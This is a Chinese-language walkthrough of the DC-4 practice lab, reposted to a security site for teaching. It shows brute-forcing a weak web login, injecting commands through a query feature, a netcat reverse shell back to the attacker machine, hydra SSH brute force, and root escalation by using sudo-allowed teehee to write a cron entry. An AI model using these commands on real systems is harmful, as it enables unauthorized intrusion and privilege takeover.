DC-4靶场练习(拯救基础学习)

admin 2024年11月17日22:31:33评论19 views字数 950阅读3分10秒阅读模式

Part.

01

DC系列是一套很不错的新手练习靶场,考验了各种基础操作以及知识点。

首先这个靶场没有ifconfig命令,我们需要安装一下

apt install net-tools

然后我们访问这个页面,发现是一个登陆的窗口,其实是弱口令,我们使用burp进行爆破

这里我们因为根据字典的不同,账号是admin,密码是happy

DC-4靶场练习(拯救基础学习)

我们利用获取的弱口令登录到后台,发现这里会执行命令查询,那么我们就可以抓包查看一下传递值

DC-4靶场练习(拯救基础学习)

DC-4靶场练习(拯救基础学习)

我修改一下这里的命令试试

DC-4靶场练习(拯救基础学习)

这里+就是代表空格

DC-4靶场练习(拯救基础学习)

成功加载了首页面出来,那么我们就来一个nc反弹吧,或者远程下载msf执行也是可以尝试的

nc 192.168.119.135 9989 -e /bin/bash

我们用+将上面的语句连接

然后攻击机开启nc接收,这样就成功反弹回来了

DC-4靶场练习(拯救基础学习)

美化一下命令界面

DC-4靶场练习(拯救基础学习)

我们查看权限,肯定是不足的

DC-4靶场练习(拯救基础学习)

我们到home目录下查看一下

DC-4靶场练习(拯救基础学习)

发现又三个人,也就是三个不同用户

我们可以检查一下每个用户目录中的文件,这里简化写

检查到jim中文件的backups目录的时候发现一个旧密码的文件

DC-4靶场练习(拯救基础学习)

我们查看发现都是一些密码,我们将这个复制下来,保存到txt文件中

我们使用hydra来破解一下看看,爆破jim这个密码

hydra ssh://192.168.119.161 -l jim -P pd.txt -t 10

DC-4靶场练习(拯救基础学习)

我们使用这个账号密码进行ssh登录

ssh jim@192.168.119.161

登录一下输入密码

登录上之后这里提示我们有一个邮件

DC-4靶场练习(拯救基础学习)

我们查看这个jim

DC-4靶场练习(拯救基础学习)

根据这个邮件我们找到关键的地方就是charles这个用户告诉了jim他的用户密码,也就是说我们可以登录这个用户

DC-4靶场练习(拯救基础学习)

复制密码粘贴上去登录成功

我们使用

sudo -l

命令查看sudo能执行的命令

DC-4靶场练习(拯救基础学习)

发现这个teehee又root权限

我们来使用设个teehee,使用它来编辑一下定时任务文件

DC-4靶场练习(拯救基础学习)

写入让bin/sh赋予可读可写可执行权限

然后我们ctrl+退出编辑

使用

ls -la /bin/sh

验证一下

DC-4靶场练习(拯救基础学习)

发现权限ok

那我们直接就可以使用bin/sh进行执行命令

DC-4靶场练习(拯救基础学习)

DC-4靶场练习(拯救基础学习)

那么到这里就完成了。

总结:

1、使用hydra进行爆破

2、了解一台Linux中不同用户在home下不同的文件夹

3、了解Linux中的邮件

4、使用了teehee进行定时任务编写获取权限

原文始发于微信公众号(白安全组):DC-4靶场练习(拯救基础学习)

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年11月17日22:31:33
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   DC-4靶场练习(拯救基础学习)https://cn-sec.com/archives/3402750.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息